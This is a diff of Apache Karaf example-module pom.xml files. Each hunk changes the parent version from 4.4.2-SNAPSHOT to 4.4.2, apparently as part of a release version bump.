examples/karaf-config-example/karaf-config-example-managed-factory/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-managed/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/karaf-config-example-static/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-config-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-config-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-deployer-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-app/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-dynamic-dist/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/karaf-docker-example-static-dist/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-docker-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-docker-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-dump-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-graphql-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-commands/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-graphql-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf-graphql-example</artifactId> <groupId>org.apache.karaf.examples</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf-graphql-example</artifactId> <groupId>org.apache.karaf.examples</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-scr-servlet/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf-graphql-example</artifactId> <groupId>org.apache.karaf.examples</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/karaf-graphql-example-websocket/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <artifactId>karaf-graphql-example</artifactId> <groupId>org.apache.karaf.examples</groupId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-graphql-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/karaf-http-resource-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-http-resource-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/karaf-http-resource-example-whiteboard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-http-resource-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-http-resource-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-itest-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-app/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-wab/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/karaf-jaas-example-war/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jaas-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jaas-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/karaf-jdbc-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jdbc-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jdbc-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/karaf-jms-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jms-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/karaf-jms-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jms-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jms-example/pom.xml+1 −1 modified@@ -25,7 +25,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-api/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-eclipselink/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-hibernate/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/karaf-jpa-example-provider-blueprint-openjpa/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-blueprint</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-blueprint/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-eclipselink/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-hibernate/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/karaf-jpa-example-provider-ds-openjpa/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider-ds</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/karaf-jpa-example-provider-ds/pom.xml+1 −1 modified@@ -22,7 +22,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example-provider</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/karaf-jpa-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-jpa-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-jpa-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/karaf-log-appender-example-core/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-log-appender-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/karaf-log-appender-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-log-appender-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-log-appender-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/karaf-maven-example-run-bundle/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-maven-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/karaf-maven-example-run/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-maven-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-maven-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/karaf-mbean-example-simple/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-mbean-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-mbean-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-command/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/karaf-redis-example-service/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-redis-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-redis-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-cxf/pom.xml+1 −1 modified@@ -17,7 +17,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-http/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/karaf-rest-example-client-jersey/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example-client</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/karaf-rest-example-whiteboard/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-rest-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-rest-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/karaf-scheduler-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scheduler-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/karaf-scheduler-example-runnable/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scheduler-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scheduler-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/karaf-scr-example-provider/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-scr-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-scr-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-annotation/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-registration/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-scr/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/karaf-servlet-example-upload/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-servlet-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-servlet-example/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>apache-karaf-examples</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-api/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-blueprint/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-client/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
examples/karaf-soap-example/karaf-soap-example-features/pom.xml+1 −1 modified@@ -24,7 +24,7 @@ <parent> <groupId>org.apache.karaf.examples</groupId> <artifactId>karaf-soap-example</artifactId> - <version>4.4.2-SNAPSHOT</version> + <version>4.4.2</version> <relativePath>../pom.xml</relativePath> </parent>
